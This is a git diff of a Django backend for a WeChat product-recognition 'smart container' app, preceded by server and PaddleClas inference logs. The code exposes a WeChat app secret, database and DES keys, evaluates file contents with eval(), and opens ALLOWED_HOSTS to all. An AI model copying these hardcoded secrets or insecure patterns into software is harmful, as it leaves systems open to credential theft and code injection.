03:16:34 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-21 03:16:34 INFO: enable_benchmark : True +2022-02-21 03:16:34 INFO: enable_mkldnn : True +2022-02-21 03:16:34 INFO: enable_profile : False +2022-02-21 03:16:34 INFO: gpu_mem : 8000 +2022-02-21 03:16:34 INFO: image_shape : [3, 640, 640] +2022-02-21 03:16:34 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-21 03:16:34 INFO: ir_optim : True +2022-02-21 03:16:34 INFO: labe_list : ['foreground'] +2022-02-21 03:16:34 INFO: max_det_results : 5 +2022-02-21 03:16:34 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-21 03:16:34 INFO: rec_nms_thresold : 0.05 +2022-02-21 03:16:34 INFO: threshold : 0.2 +2022-02-21 03:16:34 INFO: use_fp16 : False +2022-02-21 03:16:34 INFO: use_gpu : False +2022-02-21 03:16:34 INFO: use_tensorrt : False +2022-02-21 03:16:34 INFO: IndexProcess : +2022-02-21 03:16:34 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-21 03:16:34 INFO: return_k : 5 +2022-02-21 03:16:34 INFO: score_thres : 0.5 +2022-02-21 03:16:34 INFO: RecPostProcess : None +2022-02-21 03:16:34 INFO: RecPreProcess : +2022-02-21 03:16:34 INFO: transform_ops : +2022-02-21 03:16:34 INFO: ResizeImage : +2022-02-21 03:16:34 INFO: size : 224 +2022-02-21 03:16:34 INFO: NormalizeImage : +2022-02-21 03:16:34 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 03:16:34 INFO: order : +2022-02-21 03:16:34 INFO: scale : 0.00392157 +2022-02-21 03:16:34 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 03:16:34 INFO: ToCHWImage : None +Inference: 377.274751663208 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19146|app: 0|req: 60/2074] 171.43.147.19 () {32 vars in 419 bytes} [Mon Feb 21 03:16:33 2022] POST /reference_client/ => generated 98 bytes in 2992 msecs (HTTP/1.1 200) 5 headers in 157 bytes (16 switches on core 0) +[pid: 19148|app: 0|req: 1791/2075] 210.51.42.139 () {36 vars in 801 bytes} [Mon Feb 21 03:54:07 2022] POST /search/ => generated 19976 bytes in 10 msecs (HTTP/1.1 200) 5 headers in 160 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1792/2076] 222.186.19.207 () {30 vars in 615 bytes} [Mon Feb 21 04:43:09 2022] GET http://opendata.baidu.com/api.php?query=47.100.88.229&co=&resource_id=48296&oe=utf8 => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1793/2077] 222.186.19.207 () {26 vars in 353 bytes} [Mon Feb 21 04:43:09 2022] CONNECT opendata.baidu.com:443 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1794/2078] 222.186.19.207 () {26 vars in 353 bytes} [Mon Feb 21 04:43:09 2022] CONNECT opendata.baidu.com:443 => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +2022-02-21 05:04:28 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-21 05:04:28 INFO: DetPostProcess : +2022-02-21 05:04:28 INFO: DetPreProcess : +2022-02-21 05:04:28 INFO: transform_ops : +2022-02-21 05:04:28 INFO: DetResize : +2022-02-21 05:04:28 INFO: interp : 2 +2022-02-21 05:04:28 INFO: keep_ratio : False +2022-02-21 05:04:28 INFO: target_size : [640, 640] +2022-02-21 05:04:28 INFO: DetNormalizeImage : +2022-02-21 05:04:28 INFO: is_scale : True +2022-02-21 05:04:28 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 05:04:28 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 05:04:28 INFO: DetPermute : +2022-02-21 05:04:28 INFO: Global : +2022-02-21 05:04:28 INFO: batch_size : 1 +2022-02-21 05:04:28 INFO: cpu_num_threads : 1 +2022-02-21 05:04:28 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-21 05:04:28 INFO: enable_benchmark : True +2022-02-21 05:04:28 INFO: enable_mkldnn : True +2022-02-21 05:04:28 INFO: enable_profile : False +2022-02-21 05:04:28 INFO: gpu_mem : 8000 +2022-02-21 05:04:28 INFO: image_shape : [3, 640, 640] +2022-02-21 05:04:28 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/retail/test1.jpg +2022-02-21 05:04:28 INFO: ir_optim : True +2022-02-21 05:04:28 INFO: labe_list : ['foreground'] +2022-02-21 05:04:28 INFO: max_det_results : 5 +2022-02-21 05:04:28 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-21 05:04:28 INFO: rec_nms_thresold : 0.05 +2022-02-21 05:04:28 INFO: threshold : 0.2 +2022-02-21 05:04:28 INFO: use_fp16 : False +2022-02-21 05:04:28 INFO: use_gpu : False +2022-02-21 05:04:28 INFO: use_tensorrt : False +2022-02-21 05:04:28 INFO: IndexProcess : +2022-02-21 05:04:28 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-21 05:04:28 INFO: return_k : 5 +2022-02-21 05:04:28 INFO: score_thres : 0.5 +2022-02-21 05:04:28 INFO: RecPostProcess : None +2022-02-21 05:04:28 INFO: RecPreProcess : +2022-02-21 05:04:28 INFO: transform_ops : +2022-02-21 05:04:28 INFO: ResizeImage : +2022-02-21 05:04:28 INFO: size : 224 +2022-02-21 05:04:28 INFO: NormalizeImage : +2022-02-21 05:04:28 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 05:04:28 INFO: order : +2022-02-21 05:04:28 INFO: scale : 0.00392157 +2022-02-21 05:04:28 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 05:04:28 INFO: ToCHWImage : None +Inference: 376.6441345214844 ms per batch image +[{'bbox': [0, 0, 640, 854], 'rec_docs': '小度充电宝', 'rec_scores': 1.0}] +{'bbox': [0, 0, 640, 854], 'rec_docs': '小度充电宝', 'rec_scores': 1.0} +234 +["{'bbox': [0, 0, 640, 854], 'rec_docs': '小度充电宝', 'rec_scores': 1.0}\n"] +['小度充电宝'] +['小度充电宝', '48'] +[pid: 19148|app: 0|req: 1795/2079] 210.51.42.139 () {36 vars in 810 bytes} [Mon Feb 21 05:04:27 2022] POST /reference/ => generated 120 bytes in 2913 msecs (HTTP/1.1 200) 5 headers in 158 bytes (11 switches on core 0) +[pid: 19147|app: 0|req: 126/2080] 61.165.111.99 () {38 vars in 729 bytes} [Mon Feb 21 05:04:56 2022] POST /search/ => generated 20091 bytes in 11 msecs (HTTP/1.1 200) 5 headers in 160 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1796/2081] 83.97.20.34 () {26 vars in 287 bytes} [Mon Feb 21 05:18:14 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1797/2082] 23.250.19.242 () {34 vars in 536 bytes} [Mon Feb 21 05:22:23 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1798/2083] 23.250.19.242 () {30 vars in 359 bytes} [Mon Feb 21 05:22:25 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1799/2084] 81.17.24.154 () {40 vars in 627 bytes} [Mon Feb 21 05:45:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) diff --git a/Smart_container/conf/uwsgi/uwsgi.ini b/Smart_container/conf/uwsgi/uwsgi.ini index d06de41..29318b3 100644 --- a/Smart_container/conf/uwsgi/uwsgi.ini +++ b/Smart_container/conf/uwsgi/uwsgi.ini @@ -7,18 +7,15 @@ http = :8001 chdir = /root/Smart_container # Django's wsgi file module = djangoProject.wsgi:application - -# the virtualenv (full path) - # process-related settings +pidfile = /root/Smart_container/conf/uwsgi/uwsgi.pid # master +wsgi-file = /root/Smart_container/djangoProject/wsgi.py master = true # maximum number of worker processes processes = 10 # the socket (use the full path to be safe socket = 127.0.0.1:8000 -# ... with appropriate permissions - may be needed -# chmod-socket = 664 # clear environment on exit vacuum = true # 使进程在后台运行,并将日志打到指定的日志文件或者udp服务器 @@ -26,3 +23,4 @@ daemonize = /root/Smart_container/conf/uwsgi/Smart_container_uwsgi.log #设置最大日志文件大小 log-maxsize = 5000000 + diff --git a/Smart_container/conf/uwsgi/uwsgi.pid b/Smart_container/conf/uwsgi/uwsgi.pid new file mode 100644 index 0000000..e16a94e --- /dev/null +++ b/Smart_container/conf/uwsgi/uwsgi.pid @@ -0,0 +1 @@ +19137 diff --git a/Smart_container/djangoProject/__pycache__/__init__.cpython-36.pyc b/Smart_container/djangoProject/__pycache__/__init__.cpython-36.pyc new file mode 100644 index 0000000..65f3ef2 Binary files /dev/null and b/Smart_container/djangoProject/__pycache__/__init__.cpython-36.pyc differ diff --git a/Smart_container/djangoProject/__pycache__/__init__.cpython-37.pyc b/Smart_container/djangoProject/__pycache__/__init__.cpython-37.pyc deleted file mode 100644 index 8b93db8..0000000 Binary files a/Smart_container/djangoProject/__pycache__/__init__.cpython-37.pyc and /dev/null differ diff --git a/Smart_container/djangoProject/__pycache__/__init__.cpython-38.pyc b/Smart_container/djangoProject/__pycache__/__init__.cpython-38.pyc deleted file mode 100644 index 9f028d6..0000000 Binary files a/Smart_container/djangoProject/__pycache__/__init__.cpython-38.pyc and /dev/null differ diff --git a/Smart_container/djangoProject/__pycache__/settings.cpython-36.pyc b/Smart_container/djangoProject/__pycache__/settings.cpython-36.pyc new file mode 100644 index 0000000..d269f5f Binary files /dev/null and b/Smart_container/djangoProject/__pycache__/settings.cpython-36.pyc differ diff --git a/Smart_container/djangoProject/__pycache__/settings.cpython-37.pyc b/Smart_container/djangoProject/__pycache__/settings.cpython-37.pyc deleted file mode 100644 index c2cd1fa..0000000 Binary files a/Smart_container/djangoProject/__pycache__/settings.cpython-37.pyc and /dev/null differ diff --git a/Smart_container/djangoProject/__pycache__/settings.cpython-38.pyc b/Smart_container/djangoProject/__pycache__/settings.cpython-38.pyc deleted file mode 100644 index 5d6fdd9..0000000 Binary files a/Smart_container/djangoProject/__pycache__/settings.cpython-38.pyc and /dev/null differ diff --git a/Smart_container/djangoProject/__pycache__/urls.cpython-38.pyc b/Smart_container/djangoProject/__pycache__/urls.cpython-36.pyc similarity index 51% rename from Smart_container/djangoProject/__pycache__/urls.cpython-38.pyc rename to Smart_container/djangoProject/__pycache__/urls.cpython-36.pyc index 5db3f0b..d2f3e19 100644 Binary files a/Smart_container/djangoProject/__pycache__/urls.cpython-38.pyc and b/Smart_container/djangoProject/__pycache__/urls.cpython-36.pyc differ diff --git a/Smart_container/djangoProject/__pycache__/urls.cpython-37.pyc b/Smart_container/djangoProject/__pycache__/urls.cpython-37.pyc deleted file mode 100644 index fdaeacc..0000000 Binary files a/Smart_container/djangoProject/__pycache__/urls.cpython-37.pyc and /dev/null differ diff --git a/Smart_container/djangoProject/__pycache__/wsgi.cpython-38.pyc b/Smart_container/djangoProject/__pycache__/wsgi.cpython-36.pyc similarity index 68% rename from Smart_container/djangoProject/__pycache__/wsgi.cpython-38.pyc rename to Smart_container/djangoProject/__pycache__/wsgi.cpython-36.pyc index c78a13f..46926f2 100644 Binary files a/Smart_container/djangoProject/__pycache__/wsgi.cpython-38.pyc and b/Smart_container/djangoProject/__pycache__/wsgi.cpython-36.pyc differ diff --git a/Smart_container/djangoProject/__pycache__/wsgi.cpython-37.pyc b/Smart_container/djangoProject/__pycache__/wsgi.cpython-37.pyc deleted file mode 100644 index 9c1614e..0000000 Binary files a/Smart_container/djangoProject/__pycache__/wsgi.cpython-37.pyc and /dev/null differ diff --git a/Smart_container/djangoProject/settings.py b/Smart_container/djangoProject/settings.py index 7bca838..06174e6 100644 --- a/Smart_container/djangoProject/settings.py +++ b/Smart_container/djangoProject/settings.py @@ -27,7 +27,7 @@ SECRET_KEY = 'django-insecure-a5iwd(8ljs7)5x3_sfoni_&tpq+d4$&i-wul_oysicg8g$+hak # SECURITY WARNING: don't run with debug turned on in production! DEBUG = False -ALLOWED_HOSTS = ['106.12.78.130'] +ALLOWED_HOSTS = ['*'] # Application definition @@ -40,8 +40,6 @@ INSTALLED_APPS = [ 'django.contrib.messages', 'django.contrib.staticfiles', 'app01.apps.App01Config', - 'captcha', - 'tyadmin_api_cli', # 'tyadmin_api' ] @@ -86,7 +84,7 @@ DATABASES = { 'ENGINE': 'django.db.backends.mysql', # 要连接的 数据库类型 'HOST': 'localhost', # 要连接的远程数据库的 ip地址 'PORT': '3306', # 数据库连接端口,mysql默认3306 - 'USER': 'SM_c', # 数据库已有用户名 + 'USER': 'SM_C', # 数据库已有用户名` 'PASSWORD': '105316', # 数据库已有用户密码 'NAME': 'container', # 要连接的 数据库名 } diff --git a/Smart_container/djangoProject/urls.py b/Smart_container/djangoProject/urls.py index 2534cfa..89fec56 100644 --- a/Smart_container/djangoProject/urls.py +++ b/Smart_container/djangoProject/urls.py @@ -28,10 +28,11 @@ urlpatterns = [ path('record/', views.record), path('delete/', views.delete), path('replace/', views.replace), + path('stockSale/', views.stock_sale), path('find/', views.find), path('reference/', views.reference), path('reference_client/',views.reference_client), - re_path('media/(?P.*)', serve, {"document_root": settings.MEDIA_ROOT}), + # re_path('media/(?P.*)', serve, {"document_root": settings.MEDIA_ROOT}), # re_path('^xadmin/.*', AdminIndexView.as_view()), # path('api/xadmin1/', include('tyadmin_api.urls')), ] diff --git a/Smart_container/djangoProject/views.py b/Smart_container/djangoProject/views.py new file mode 100644 index 0000000..6bba9cb --- /dev/null +++ b/Smart_container/djangoProject/views.py @@ -0,0 +1,477 @@ +#图片处理 +import base64 +import binascii +import hashlib +import json +import os +import shutil +import sys +from typing import Container + +import cv2 +#import memcache +import numpy as np +import pymysql +import requests +# 数据库相关操作 +from app01 import models +from django.http import HttpResponse, JsonResponse +from django.shortcuts import HttpResponse, render +#检索 +from fuzzywuzzy import fuzz, process +#登陆用 +from pyDes import CBC, PAD_PKCS5, des +from xpinyin import Pinyin + +# Create your views here. + +KEY='mHAxsLYz' #秘钥 +PICTURE_ROOT = '/root/Smart_container/PaddleClas/dataset/retail' + +def des_encrypt(s): + """ + DES 加密 + :param s: 原始字符串 + :return: 加密后字符串,16进制 + """ + secret_key = KEY + iv = secret_key + k = des(secret_key, CBC, iv, pad=None, padmode=PAD_PKCS5) + en = k.encrypt(s, padmode=PAD_PKCS5) + return binascii.b2a_hex(en) + + +def des_descrypt(s): + """ + DES 解密 + :param s: 加密后的字符串,16进制 + :return: 解密后的字符串 + """ + secret_key = KEY + iv = secret_key + k = des(secret_key, CBC, iv, pad=None, padmode=PAD_PKCS5) + de = k.decrypt(binascii.a2b_hex(s), padmode=PAD_PKCS5) + sessionID = de.split('_') + openid = sessionID[0] + return openid + + +def SKexpired(old_sessionID, code): + + s_openid = des_descrypt(old_sessionID) + + appid = "wx433732b2940b7d4c" + secret = "b4e95c5b998cd13ba9d09e077343f2e7" + code2SessionUrl = "https://api.weixin.qq.com/sns/jscode2session?appid={appid}&secret={secret}&js_code={code}&grant_type=authorization_code".format( + appid=appid, secret=secret, code=code) + resp = requests.get(code2SessionUrl) + respDict = resp.json() + s_session_key = respDict.get("session_key") + + s = str(s_openid) + '_' +str(s_session_key) + sessionID = des_encrypt(s) + + models.TUser.objects.filter(openid=s_openid).update(session_key=s_session_key) + + return sessionID + + + +def information(): + container = models.TContainer.objects.all() + + container_all = [] + for i in container: + temp = [] + temp.append(i.number) + temp.append(i.container_name) + temp.append(i.container_price) + temp.append(i.picture_address) + temp.append(i.stock) + container_all.append(temp) + + return container_all + + +def update(): + container_all = information() + os.remove('/root/Smart_container/PaddleClas/dataset/retail/data_update.txt') + + with open('/root/Smart_container/PaddleClas/dataset/retail/data_update.txt','a+',encoding='utf-8') as fh: + + for container_single in container_all: + container_name = container_single[1] + container_address = container_single[3] + fh.write(container_address + '\t' + container_name + '\n') + fh.close() + #有问题要修改 + os.system('python3 /root/Smart_container/PaddleClas/deploy/python/build_gallery.py -c /root/Smart_container/PaddleClas/deploy/configs/build_product.yaml -o IndexProcess.data_file="/root/Smart_container/PaddleClas/dataset/retail/data_update.txt" -o IndexProcess.index_dir="/root/Smart_container/PaddleClas/dataset/retail/index_update"') + + + +# 识别模块 +def reference(request): + if request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + value = request.POST.get('picture') + + res_all = models.TContainer.objects.all() + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + image_name = base64.b64decode(value) + + image_file = '/root/Smart_container/PaddleClas/dataset/retail/test1.jpg' + with open(image_file, "wb") as fh: + fh.write(image_name) + fh.close() + +### 商品识别 + + rec_docs_list = [] + + price_all = 0.0 + + os.system('python3 /root/Smart_container/PaddleClas/deploy/python/predict_system.py -c /root/Smart_container/PaddleClas/deploy/configs/inference_product.yaml -o Global.use_gpu=False') + + + log_path = '/root/Smart_container/PaddleClas/dataset/log.txt' + + with open(log_path, 'r', encoding='utf8') as F: + + str_result_list = F.readlines() + + + if str_result_list[0] == "Please connect root to upload container's name and it's price!\n": + + rec_deplay_str_all = str_result_list[0] + os.remove(log_path) + return JsonResponse({"state": 'true',"container": rec_deplay_str_all}) + + else: + for str_result in str_result_list: + + price_all = 0 + + rec_docs_price = [] + + dict_result = eval(str_result) + + rec_docs = dict_result['rec_docs'] # 结果 + rec_docs_list.append(rec_docs) + + + + for rec_docs_sig in rec_docs_list: + for res in res_all: + if res.container_name== rec_docs_sig: + rec_price = res.container_price + price_all += float(rec_price) + # rec_docs_price.append(res.number) + rec_docs_price.append(rec_docs_sig) + rec_docs_price.append(rec_price) + print("你是傻逼") + print(rec_docs_price) + print("你是傻逼") + + os.remove(log_path) + return JsonResponse({"state": 'true', "container": rec_docs_price, "price_all": price_all, "picture_test":'test1.jpg'}) + else: + return JsonResponse({"state": 'false'}) + + +#登录 + +def login_in(request): + if request.method == "POST": + code = request.POST.get('code') + userinfo = request.POST.get('userinfo') + userinfo = json.loads(userinfo) + s_nickname = userinfo['nickName'] + + appid = "wx433732b2940b7d4c" + secret = "b4e95c5b998cd13ba9d09e077343f2e7" + code2SessionUrl = "https://api.weixin.qq.com/sns/jscode2session?appid={appid}&secret={secret}&js_code={code}&grant_type=authorization_code".format( + appid=appid, secret=secret, code=code) + resp = requests.get(code2SessionUrl) + respDict = resp.json() + s_openid = respDict.get("openid") #需要存入的openid + s_session_key = respDict.get("session_key") #需要存入的session_key + + s = str(s_openid) + '_' +str(s_session_key) + sessionID = des_encrypt(s) + sessionID = str(sessionID) + + old_openid = models.TUser.objects.filter(openid=s_openid) #old_openid是查询数据库中是否有s_openid,无为空 + old_openid = old_openid.values() + if not bool(old_openid): #判断表中是否还有对应openid + s_user = models.TUser(openid = s_openid, nickname = s_nickname, session_key = s_session_key) + s_user.save() + update() + else: + models.TUser.objects.filter(openid=s_openid).update(session_key=s_session_key) #替换session_key + + + return JsonResponse({"sessionID": sessionID}) + + +def record(request): #增加模块 + if request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + s_container_name = request.POST.get('container_name') #商品名称 str + s_container_price = request.POST.get('container_price') #商品单价 float + s_stock = requests.POST.get('container_stock') #商品库存 int + + picture = request.FILES['productimage'] #照片 + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + value_name = s_container_name + + + p = Pinyin() + name = p.get_pinyin(value_name).replace('-','') + + s_picture_address = 'gallery/'+ name + '.jpg' + + with open(os.path.join(PICTURE_ROOT,s_picture_address), 'wb') as fh: + for chunk in picture.chunks(): + fh.write(chunk) + fh.close() + + last_data = models.TContainer.objects.last() #查询t_container表中最后一条数据,以便于商品录入排序 + if not bool(last_data.number): + s_number = 1 #序号 + else: + s_number = last_data.number + 1 + + old_container = models.TContainer.objects.filter(container_name=s_container_name) + old_container = old_container.values() + + if not bool(old_container): + + s_container = models.TContainer(number=s_number, container_name=s_container_name, container_price=s_container_price, + picture_address=s_picture_address, stock=s_stock) + s_container.save() + update() + return JsonResponse({"state": 'true', "sessionID": sessionID}) + + else: + return JsonResponse({"state": 'true', "sessionID": sessionID}) + else: + return JsonResponse({"state": 'false'}) + + + +def delete(request): #删除模块 + if request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + d_number = request.POST.get('number') + d_container_name = request.POST.get('container_name') + + value_name = d_container_name + + + p = Pinyin() + name = p.get_pinyin(value_name).replace('-','') + + s_picture_address = os.path.join(PICTURE_ROOT,'gallery/'+ name + '.jpg') + os.remove(s_picture_address) + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + d_number = int(d_number) + old_container = models.TContainer.objects.filter(number = d_number) #查询t_container表中所有数据,判断表中是否已经包含目标商品 + old_container = old_container.values() + + if not bool(old_container): #表内不含待删除商品 + return JsonResponse({"state": 'false', "sessionID": sessionID}) + else: + models.TContainer.objects.filter(number = d_number).delete() + + update() + return JsonResponse({"state": 'true', "sessionID": sessionID}) + + else: + return JsonResponse({"state": 'false'}) + + +def replace(request): #修改模块 + if request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + number = request.POST.get('number') + r_container_name = request.POST.get('container_name') + r_container_price = request.POST.get('container_price') + r_stock = request.POST.get('container_stock') + isimageRevised = request.POST.get('isimageRevised') + + if isimageRevised == True: + r_picture = request.FILES['productimage'] + p = Pinyin() + name = p.get_pinyin(r_container_name).replace('-','') + s_picture_address = os.path.join(PICTURE_ROOT,'gallery/'+ name + '.jpg') + with open(s_picture_address, 'wb+') as fh: + fh.write(r_picture.read()) + fh.close() + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + models.TContainer.objects.filter(number=number).update(container_name=r_container_name) + + models.TContainer.objects.filter(number=number).update(container_price=r_container_price) + + models.TContainer.objects.filter(number=number).updata(stock=r_stock) + + update() + return JsonResponse({"state": 'true', "sessionID": sessionID}) + + else: + return JsonResponse({"state": 'false'}) + + +def search(request): #查询模块 + if request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + container_all = information() + + return JsonResponse({"state": 'true', "sessionID": sessionID, 'container_all': container_all}) + else: + return JsonResponse({"state": 'false'}) + + +def find(request): #检索模块 + if request.method== "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + searchtarget = request.POST.get('searchtarget') + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + container = models.TContainer.objects.all() + + find_result = [] + for i in container: + + value = fuzz.partial_ratio("%s"%searchtarget,i.container_name) + + if value>=80: + temp = [] + temp.append(i.number) + temp.append(i.container_name) + temp.append(i.container_price) + temp.append(i.picture_address) + find_result.append(temp) + + return JsonResponse({"state": 'true', "sessionID": sessionID,"container_all":find_result}) + else: + return JsonResponse({"state": 'false'}) + + +def stock_sale(request): #商品销售 + if request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + container_sale = request.POST.get('stocksale') + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + container = models.TContainer.objects.all() + + for i in container_sale: #[['number','stock'],.....] + for j in container: + if j.number == i[0]: + models.TContainer.objects.filter(number=i[0]).update(stock=j.stock - i[1]) + break + return JsonResponse({"state": 'true', "sessionID": sessionID}) + else: + return JsonResponse({"state": 'false'}) + + + +def reference_client(request): + if request.method == 'POST': + req = json.loads(request.body) #将json编码的字符串再转换为python的数据结构 + print('req') + name = req['name'] + img_str = req['image'] #得到unicode的字符串 + img_decode_ = img_str.encode('ascii') #从unicode变成ascii编码 + img_decode = base64.b64decode(img_decode_) #解base64编码,得图片的二进制 + img_np_ = np.frombuffer(img_decode, np.uint8) + img = cv2.imdecode(img_np_, cv2.COLOR_RGB2BGR) #转为opencv格式 + + cv2.imwrite('/root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg', img) #存储路径 + + ### 商品识别 + res_all = models.TContainer.objects.all() + + rec_docs_list = [] + + price_all = 0.0 + + os.system('python3 /root/Smart_container/PaddleClas/deploy/python/predict_client.py -c /root/Smart_container/PaddleClas/deploy/configs/inference_client.yaml -o Global.use_gpu=False') + + + log_path = '/root/Smart_container/PaddleClas/dataset/log_client.txt' + + with open(log_path, 'r', encoding='utf8') as F: + + str_result_list = F.readlines() + # print(str_result_list) + + if str_result_list[0] == "Please connect root to upload container's name and it's price!\n": + + rec_deplay_str_all = str_result_list[0] + os.remove(log_path) + return JsonResponse({"state": 'true',"container": rec_deplay_str_all}) + + else: + + for str_result in str_result_list: + + price_all = 0 + + rec_docs_price = [] + + dict_result = eval(str_result) + + rec_docs = dict_result['rec_docs'] # 结果 + rec_docs_list.append(rec_docs) + + + + for rec_docs_sig in rec_docs_list: + for res in res_all: + if res.container_name== rec_docs_sig: + rec_price = res.container_price + price_all += float(rec_price) + rec_docs_price.append(rec_docs_sig) + rec_docs_price.append(rec_price) + + + os.remove(log_path) + return JsonResponse({"state": 'true',"container": rec_docs_price,"price_all": price_all,"picture_test":'test_client.jpg'}) + + else: + return JsonResponse({"state": 'false'}) diff --git a/Smart_container/media/2020-11-30-f44ec51b-7709-43eb-b2bf-4b774c10956d-logo.jpg b/Smart_container/media/2020-11-30-f44ec51b-7709-43eb-b2bf-4b774c10956d-logo.jpg deleted file mode 100644 index fa1a25c..0000000 Binary files a/Smart_container/media/2020-11-30-f44ec51b-7709-43eb-b2bf-4b774c10956d-logo.jpg and /dev/null differ diff --git a/Smart_container/media/2020-11-30-fcbe0e2e-3909-4ad5-a5a5-69bc57fbaf9f-funpy.jpeg b/Smart_container/media/2020-11-30-fcbe0e2e-3909-4ad5-a5a5-69bc57fbaf9f-funpy.jpeg deleted file mode 100644 index d1eef18..0000000 Binary files a/Smart_container/media/2020-11-30-fcbe0e2e-3909-4ad5-a5a5-69bc57fbaf9f-funpy.jpeg and /dev/null differ diff --git a/Smart_container/media/funpy.jpeg b/Smart_container/media/funpy.jpeg deleted file mode 100644 index d1eef18..0000000 Binary files a/Smart_container/media/funpy.jpeg and /dev/null differ diff --git a/Smart_container/media/funpy_RRKdE2w.jpeg b/Smart_container/media/funpy_RRKdE2w.jpeg deleted file mode 100644 index d1eef18..0000000 Binary files a/Smart_container/media/funpy_RRKdE2w.jpeg and /dev/null differ diff --git a/Smart_container/media/funpy_dsWgUH7.jpeg b/Smart_container/media/funpy_dsWgUH7.jpeg deleted file mode 100644 index d1eef18..0000000 Binary files a/Smart_container/media/funpy_dsWgUH7.jpeg and /dev/null differ diff --git a/Smart_container/media/logo.jpg b/Smart_container/media/logo.jpg deleted file mode 100644 index fa1a25c..0000000 Binary files a/Smart_container/media/logo.jpg and /dev/null differ diff --git a/Smart_container/media/noImage.png b/Smart_container/media/noImage.png deleted file mode 100644 index 368341c..0000000 Binary files a/Smart_container/media/noImage.png and /dev/null differ diff --git a/Smart_container/output/test1.jpg b/Smart_container/output/test1.jpg index 4c2cda8..db13332 100644 Binary files a/Smart_container/output/test1.jpg and b/Smart_container/output/test1.jpg differ diff --git a/Smart_container/output/test_client.jpg b/Smart_container/output/test_client.jpg index 9c11494..2858712 100644 Binary files a/Smart_container/output/test_client.jpg and b/Smart_container/output/test_client.jpg differ diff --git a/Smart_container/ssl/1_thomas-yanxin.com_bundle.crt b/Smart_container/ssl/1_thomas-yanxin.com_bundle.crt new file mode 100644 index 0000000..1a58210 --- /dev/null +++ b/Smart_container/ssl/1_thomas-yanxin.com_bundle.crt @@ -0,0 +1,63 @@ +-----BEGIN CERTIFICATE----- +MIIGJTCCBQ2gAwIBAgIQCECzjwlA2Yj86az0JYrLCDANBgkqhkiG9w0BAQsFADBy +MQswCQYDVQQGEwJDTjElMCMGA1UEChMcVHJ1c3RBc2lhIFRlY2hub2xvZ2llcywg +SW5jLjEdMBsGA1UECxMURG9tYWluIFZhbGlkYXRlZCBTU0wxHTAbBgNVBAMTFFRy +dXN0QXNpYSBUTFMgUlNBIENBMB4XDTIxMTEwODAwMDAwMFoXDTIyMTEwNzIzNTk1 +OVowHDEaMBgGA1UEAxMRdGhvbWFzLXlhbnhpbi5jb20wggEiMA0GCSqGSIb3DQEB +AQUAA4IBDwAwggEKAoIBAQCfWWCt55HSfiwBq1/H7RZxgMHEo1DN+ZspBGq1s7yu +BeFXQKlzLlfBSrwajuYyMZLS7yT/UZGIbJQe62DWsdJYsTt0MICgCPKAsA1Ia31T +ghtb3qoI86Uf2tc9JgHELyK9RyxTZZYmeT/KIYcNp5Lt7W/0ASrKSlPxQ4lxhSVU +Ii7xymADER7/4UlmVadO4xtoNk5G4tjNgaQIZnVw6SeODXNUxF51Lcizoq+k7AgL 